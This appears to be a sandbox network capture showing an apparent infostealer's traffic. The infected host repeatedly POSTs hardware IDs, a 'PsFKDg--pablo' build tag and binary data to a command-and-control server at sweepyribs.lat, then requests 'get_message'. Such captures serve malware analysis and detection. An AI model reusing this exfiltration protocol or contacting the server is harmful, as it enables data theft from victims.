2024-12-17 05:04:31 UTC	305	IN	Data Raw: 54 74 64 79 48 45 6a 30 5a 37 6c 53 49 53 52 75 76 74 42 70 6e 61 71 5a 67 58 47 71 6d 36 51 46 72 46 70 44 45 43 37 79 61 71 64 4f 68 43 51 30 58 2b 46 79 6e 56 77 38 50 42 43 77 79 44 72 5a 75 4a 4f 54 48 66 58 4a 75 43 72 68 46 56 4e 75 4e 70 4e 71 32 52 6a 50 61 6d 45 42 6f 6e 62 57 43 58 42 71 4c 65 4b 43 61 49 6a 38 77 6f 5a 78 31 4b 36 78 48 36 68 46 56 54 6c 68 36 6a 33 5a 41 63 39 71 43 67 2f 72 59 34 31 41 4a 69 41 2b 39 39 42 52 78 61 72 5a 67 52 65 71 76 4b 51 62 6f 56 4a 45 50 79 4f 4e 5a 5a 4d 4a 6e 7a 55 6b 51 4b 49 71 31 6c 64 77 64 58 32 2b 30 47 71 61 71 70 6d 52 48 62 48 63 39 45 4c 2f 42 30 31 67 64 2b 70 6c 32 56 62 64 66 48 4e 64 6f 6a 7a 57 46 6a 4d 2f 50 50 61 54 65 49 69 74 2f 2f 39 6f 38 49 53 68 41 72 35 72 62 43 6c 30 70 33 57 Data Ascii: TtdyHEj0Z7lSISRuvtBpnaqZgXGqm6QFrFpDEC7yaqdOhCQ0X+FynVw8PBCwyDrZuJOTHfXJuCrhFVNuNpNq2RjPamEBonbWCXBqLeKCaIj8woZx1K6xH6hFVTlh6j3ZAc9qCg/rY41AJiA+99BRxarZgReqvKQboVJEPyONZZMJnzUkQKIq1ldwdX2+0GqaqpmRHbHc9EL/B01gd+pl2VbdfHNdojzWFjM/PPaTeIit//9o8IShAr5rbCl0p3W
2024-12-17 05:04:31 UTC	1369	IN	Data Raw: 32 62 66 31 0d 0a 2b 53 66 56 31 31 68 39 77 4b 32 36 6f 77 43 44 4c 37 74 43 42 46 37 72 62 2f 45 44 38 41 67 4a 38 63 65 52 71 32 52 6a 50 61 6d 45 42 6f 6e 62 57 43 58 42 71 4c 65 4b 43 61 49 6a 38 77 6f 5a 78 31 4b 65 67 45 36 70 53 51 6d 78 41 6f 57 65 65 54 73 46 79 50 41 2b 36 58 64 59 5a 63 42 4a 67 73 49 67 75 30 36 72 30 77 6b 48 6b 6a 72 45 45 34 6e 74 56 4b 47 75 74 59 39 73 67 68 43 59 30 44 36 77 6b 6b 42 46 6f 66 57 43 77 6c 48 2f 4c 73 70 47 54 46 4c 2f 61 38 45 58 39 53 68 77 33 4c 72 77 7a 77 56 7a 42 63 69 45 50 75 69 54 52 55 69 49 2f 4b 50 4f 47 62 63 7a 55 2f 38 4a 5a 35 34 61 73 46 4a 46 72 66 43 4e 76 71 58 33 62 50 35 6b 2f 49 30 7a 6e 59 36 68 76 50 69 6f 36 39 35 35 6f 69 36 71 50 67 55 43 71 30 5a 35 56 35 78 56 74 59 43 36 79 Data Ascii: 2bf1+SfV11h9wK26owCDL7tCBF7rb/ED8AgJ8ceRq2RjPamEBonbWCXBqLeKCaIj8woZx1KegE6pSQmxAoWeeTsFyPA+6XdYZcBJgsIgu06r0wkHkjrEE4ntVKGutY9sghCY0D6wkkBFofWCwlH/LspGTFL/a8EX9Shw3LrwzwVzBciEPuiTRUiI/KPOGbczU/8JZ54asFJFrfCNvqX3bP5k/I0znY6hvPio6955oi6qPgUCq0Z5V5xVtYC6y
2024-12-17 05:04:31 UTC	1369	IN	Data Raw: 78 6c 59 78 33 39 4b 6f 38 52 4a 6d 31 32 6f 74 34 75 6d 61 71 5a 67 51 6a 70 6d 37 55 54 72 45 4e 52 61 56 43 55 56 4a 63 4a 6a 69 51 6a 51 75 35 46 6c 55 41 36 45 78 44 6c 6b 32 43 46 37 64 66 51 44 36 54 4a 71 46 58 33 62 42 4a 6d 4c 70 55 39 32 52 62 50 61 6e 4e 36 34 57 71 59 56 69 59 38 59 39 65 65 61 59 72 38 30 63 78 44 79 34 71 32 48 2b 38 62 45 69 67 75 38 69 48 58 54 6f 73 6a 63 78 65 79 4e 73 30 45 59 33 70 2b 6f 6f 38 67 6b 71 72 58 67 52 65 34 78 2b 63 48 37 77 30 53 61 57 32 34 59 5a 38 4e 6d 54 46 30 63 64 78 42 67 56 49 67 4b 79 33 4f 72 6b 57 48 37 4d 62 62 53 4f 79 76 68 31 58 68 46 56 31 75 4e 70 4d 7a 30 55 36 77 66 48 4e 58 6f 6a 7a 57 5a 44 4d 6a 49 50 65 47 66 38 62 50 31 73 4a 66 37 49 72 6e 57 2b 39 54 45 6e 59 2b 35 44 4f 64 48 Data Ascii: xlYx39Ko8RJm12ot4umaqZgQjpm7UTrENRaVCUVJcJjiQjQu5FlUA6ExDlk2CF7dfQD6TJqFX3bBJmLpU92RbPanN64WqYViY8Y9eeaYr80cxDy4q2H+8bEigu8iHXTosjcxeyNs0EY3p+oo8gkqrXgRe4x+cH7w0SaW24YZ8NmTF0cdxBgVIgKy3OrkWH7MbbSOyvh1XhFV1uNpMz0U6wfHNXojzWZDMjIPeGf8bP1sJf7IrnW+9TEnY+5DOdH

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.5	50077	104.21.2.110	443

Timestamp	Bytes transferred	Direction	Data
2024-12-17 05:04:34 UTC	270	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=225CZ2MO User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12775 Host: sweepyribs.lat
2024-12-17 05:04:34 UTC	12775	OUT	Data Raw: 2d 2d 32 32 35 43 5a 32 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 43 33 32 34 41 37 32 38 42 38 32 34 32 44 32 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 32 32 35 43 5a 32 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 32 35 43 5a 32 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 32 32 35 43 5a 32 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 Data Ascii: --225CZ2MOContent-Disposition: form-data; name="hwid"5C324A728B8242D2AC8923850305D13E--225CZ2MOContent-Disposition: form-data; name="pid"2--225CZ2MOContent-Disposition: form-data; name="lid"PsFKDg--pablo--225CZ2MOContent-Disposit
2024-12-17 05:04:35 UTC	1036	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 05:04:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6v3d3up8e893n2osrelbgg4he2; expires=Fri, 11-Apr-2025 22:51:13 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EXOwu3DqAbaBs7ESoloOfM1d0VEFpzXxClEhqniS3hbBGhYuWjxE4YPyqYBuF3CG90EnFGM76XQINB4Xsh4BZr%2BhTxt25mdegn0mbOMleUaUBZHyyH8luVjtjSs1cBo7Bw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f345f859baa1851-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1715&min_rtt=1707&rtt_var=657&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2833&recv_bytes=13703&delivery_rate=1643218&cwnd=214&unsent_bytes=0&cid=c71425fc967eb8a2&ts=1089&x=0"
2024-12-17 05:04:35 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-17 05:04:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.5	50079	104.21.2.110	443

Timestamp	Bytes transferred	Direction	Data
2024-12-17 05:04:36 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=XR66J1O2UAEJRP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15053 Host: sweepyribs.lat
2024-12-17 05:04:36 UTC	15053	OUT	Data Raw: 2d 2d 58 52 36 36 4a 31 4f 32 55 41 45 4a 52 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 43 33 32 34 41 37 32 38 42 38 32 34 32 44 32 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 58 52 36 36 4a 31 4f 32 55 41 45 4a 52 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 52 36 36 4a 31 4f 32 55 41 45 4a 52 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 58 52 36 36 4a 31 4f 32 Data Ascii: --XR66J1O2UAEJRPContent-Disposition: form-data; name="hwid"5C324A728B8242D2AC8923850305D13E--XR66J1O2UAEJRPContent-Disposition: form-data; name="pid"2--XR66J1O2UAEJRPContent-Disposition: form-data; name="lid"PsFKDg--pablo--XR66J1O2
2024-12-17 05:04:37 UTC	1040	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 05:04:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rdcq15vse9cmn56bpapbp59hro; expires=Fri, 11-Apr-2025 22:51:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HtcD8VAfkAtqjGR9gEaOMZOjojaA8cnGwpRNqHh3EFzHTuY%2FLITJFCaPJ6ISZXSqYwAMh2AE2F0pblEapIYDMA%2Bip0wf4ha3si7Jv%2BC5hIvmtgZEKlW1TW2xPuDfgDmFAQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f345f94288c2363-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1798&min_rtt=1791&rtt_var=686&sent=12&recv=20&lost=0&retrans=0&sent_bytes=2833&recv_bytes=15987&delivery_rate=1580086&cwnd=252&unsent_bytes=0&cid=d89929e73cf46299&ts=825&x=0"
2024-12-17 05:04:37 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-17 05:04:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.5	50084	104.21.2.110	443

Timestamp	Bytes transferred	Direction	Data
2024-12-17 05:04:38 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=WB9I5LPDIK09YI6I User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20555 Host: sweepyribs.lat
2024-12-17 05:04:38 UTC	15331	OUT	Data Raw: 2d 2d 57 42 39 49 35 4c 50 44 49 4b 30 39 59 49 36 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 43 33 32 34 41 37 32 38 42 38 32 34 32 44 32 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 57 42 39 49 35 4c 50 44 49 4b 30 39 59 49 36 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 57 42 39 49 35 4c 50 44 49 4b 30 39 59 49 36 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 57 42 Data Ascii: --WB9I5LPDIK09YI6IContent-Disposition: form-data; name="hwid"5C324A728B8242D2AC8923850305D13E--WB9I5LPDIK09YI6IContent-Disposition: form-data; name="pid"3--WB9I5LPDIK09YI6IContent-Disposition: form-data; name="lid"PsFKDg--pablo--WB
2024-12-17 05:04:38 UTC	5224	OUT	Data Raw: 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 Data Ascii: MMZh'F3Wun 4F([:7s~X`nO`i
2024-12-17 05:04:39 UTC	1038	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 05:04:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=kujqld10jpna0gji50assus8k1; expires=Fri, 11-Apr-2025 22:51:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FqtJxBRAMIeETxfCyobBXeHkG%2BDABwjtasUC3c2g64NCdezYUA0VRuNtpBVR80i7JdENlf2SfDoLCpBRS2YZsH76kUQ%2BEvE3utl2lYSIipSjDxSu71O1edfqF8YPVn6gIw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f345fa17a5e728f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2012&min_rtt=1868&rtt_var=803&sent=18&recv=25&lost=0&retrans=0&sent_bytes=2832&recv_bytes=21513&delivery_rate=1563169&cwnd=149&unsent_bytes=0&cid=659a85190988ea00&ts=922&x=0"
2024-12-17 05:04:39 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-17 05:04:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.5	50088	104.21.2.110	443

Timestamp	Bytes transferred	Direction	Data
2024-12-17 05:04:40 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Q3VQNTWM9P39NQXS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1304 Host: sweepyribs.lat
2024-12-17 05:04:40 UTC	1304	OUT	Data Raw: 2d 2d 51 33 56 51 4e 54 57 4d 39 50 33 39 4e 51 58 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 43 33 32 34 41 37 32 38 42 38 32 34 32 44 32 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 51 33 56 51 4e 54 57 4d 39 50 33 39 4e 51 58 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 33 56 51 4e 54 57 4d 39 50 33 39 4e 51 58 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 51 33 Data Ascii: --Q3VQNTWM9P39NQXSContent-Disposition: form-data; name="hwid"5C324A728B8242D2AC8923850305D13E--Q3VQNTWM9P39NQXSContent-Disposition: form-data; name="pid"1--Q3VQNTWM9P39NQXSContent-Disposition: form-data; name="lid"PsFKDg--pablo--Q3
2024-12-17 05:04:41 UTC	1033	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 05:04:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=e7v10ibskkv1o6qav9df8bsf55; expires=Fri, 11-Apr-2025 22:51:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HciBVsriAgzcuzWyGQYixjODAFBy3lUQb5zv8ASrzJNJJL6uIqJKXp7tUp603YB9lpnLw0XpKVHiqnugPSTcwZ6FGdMJhzUmmIL5b7oqbMFG%2Fl5ttx54TTil7DzMQjpe9A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f345faef9a632e4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1811&min_rtt=1797&rtt_var=684&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2217&delivery_rate=1624930&cwnd=162&unsent_bytes=0&cid=9d21c620116ecdac&ts=735&x=0"
2024-12-17 05:04:41 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-17 05:04:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.5	50089	104.21.2.110	443

Timestamp	Bytes transferred	Direction	Data
2024-12-17 05:04:43 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=4QP2GXHW7P User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 29546 Host: sweepyribs.lat
2024-12-17 05:04:43 UTC	15331	OUT	Data Raw: 2d 2d 34 51 50 32 47 58 48 57 37 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 43 33 32 34 41 37 32 38 42 38 32 34 32 44 32 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 34 51 50 32 47 58 48 57 37 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 51 50 32 47 58 48 57 37 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 34 51 50 32 47 58 48 57 37 50 0d 0a 43 6f 6e 74 65 6e 74 2d Data Ascii: --4QP2GXHW7PContent-Disposition: form-data; name="hwid"5C324A728B8242D2AC8923850305D13E--4QP2GXHW7PContent-Disposition: form-data; name="pid"1--4QP2GXHW7PContent-Disposition: form-data; name="lid"PsFKDg--pablo--4QP2GXHW7PContent-
2024-12-17 05:04:43 UTC	14215	OUT	Data Raw: 64 49 f9 19 26 51 3d a1 e2 d6 c4 b5 8d 5d 4a db ae 7f f0 08 04 f2 8b dc ae fd 31 6a 2a 98 78 27 1a 8b 19 ac 07 40 8e df 55 37 78 fd 94 84 f7 36 d3 2d b0 ea 1c be 79 9f 12 30 65 fa ca 85 54 60 d1 01 ab 05 57 6a 00 3c 8a 5a e6 af f6 8b 13 e0 63 80 63 ff 5c a1 a9 52 c4 19 50 fb 31 a9 c9 9e cc 0c c7 28 96 da 63 46 ff 4d 3d b5 c3 a1 5a e3 41 2f ed 9b 28 30 dc aa 01 b6 8e e3 b4 78 7e bf c4 8a ce 49 ac c8 69 e3 f7 22 a7 94 87 c9 d7 e2 a7 a4 2c cc 5b bb 33 44 e9 73 94 bc 74 87 bc cb e4 1b 59 5a d2 13 d4 f6 77 8d 60 7f d8 21 49 5d 37 73 68 fe 6d 09 a4 ce ef 30 d8 31 e8 35 50 eb 8d 9f 53 9e ff da 94 a9 04 b4 0b 12 93 bc 3f 25 1a bd b1 ef 3a 0b 7f e3 b3 84 dc 74 8c d6 ec 8f 3b 5c bd 0b 48 4b 7d 68 3c 2c 88 f6 82 b1 2a 5e b2 ec fe 58 5d 72 1f 54 9d b4 d9 2b a8 86 44 Data Ascii: dI&Q=]J1jx'@U7x6-y0eT`Wj<Zcc\RP1(cFM=ZA/(0x~Ii",[3DstYZw`!I]7shm015PS?%:t;\HK}h<,^X]rT+D
2024-12-17 05:04:45 UTC	1044	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 05:04:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gt59hbk2m3pqigcc0uv35bgm5s; expires=Fri, 11-Apr-2025 22:51:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rAKL0gl9Qb3oiLpRbgmV3bNzW%2FjIt%2FFDpeb1dJL3DyxnrqjwUn9MTvlu3HqxYr09DWDqRjqjRE9mslOIzyJm8WzUsYK9xZyblqILf2wCi5%2FCKTi82Mt8EbzKUrF3Li0vFw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f345fc12c7f41f3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=17998&min_rtt=1627&rtt_var=10435&sent=14&recv=35&lost=0&retrans=0&sent_bytes=2832&recv_bytes=30520&delivery_rate=1794714&cwnd=223&unsent_bytes=0&cid=b9177583761d964e&ts=1793&x=0"
2024-12-17 05:04:45 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-17 05:04:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.5	50090	104.21.2.110	443

Timestamp	Bytes transferred	Direction	Data
2024-12-17 05:04:46 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 82 Host: sweepyribs.lat
2024-12-17 05:04:46 UTC	82	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d 26 68 77 69 64 3d 35 43 33 32 34 41 37 32 38 42 38 32 34 32 44 32 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 Data Ascii: act=get_message&ver=4.0&lid=PsFKDg--pablo&j=&hwid=5C324A728B8242D2AC8923850305D13E
2024-12-17 05:04:47 UTC	1033	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 05:04:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=uof3k8vupe8kahmambr7mf93gk; expires=Fri, 11-Apr-2025 22:51:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V2FjAm6af3Hzky0kZ21RthgrsLVguXcBSh7FCsBXfsovMvAW4hAmyKYoiCOSaMoY3hk93MpzC75y3fFKRS8D68YM0CyiM3gLNILAuTtgZi7MhYCxxbQ0ydEjfmS%2BPMBFHg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f345fd4c8067c7b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2247&min_rtt=1858&rtt_var=975&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=980&delivery_rate=1571582&cwnd=207&unsent_bytes=0&cid=ace729f792db4f7f&ts=1003&x=0"
2024-12-17 05:04:47 UTC	214	IN	Data Raw: 64 30 0d 0a 51 34 71 48 35 34 74 35 46 2f 46 51 43 75 4b 57 72 58 77 68 4d 38 57 72 4a 52 70 7a 36 77 4e 63 57 4d 6d 66 31 73 71 6b 2f 61 49 59 38 61 57 53 71 55 4d 31 6d 53 52 2b 6b 71 7a 78 55 33 30 63 39 4a 4d 51 4e 45 48 61 4e 6e 4a 70 2b 4b 7a 34 2b 35 4b 68 6a 53 7a 73 34 62 75 6b 48 58 4b 58 66 6d 2b 61 38 34 39 51 41 31 57 78 69 52 38 71 58 38 6c 6d 66 6d 4c 35 34 76 71 78 68 6f 69 41 65 61 6a 76 6b 2f 38 4a 4c 61 31 2f 56 73 32 6e 6c 55 6b 50 41 66 53 65 43 79 74 43 32 43 31 74 62 70 57 77 70 62 37 42 6e 4d 38 66 70 66 57 47 35 52 31 34 6e 48 35 76 6d 76 4f 50 55 41 4e 56 73 59 6b 66 4b 6c 2f 4a 5a 6e 35 69 2b 65 4b 4c 0d 0a Data Ascii: 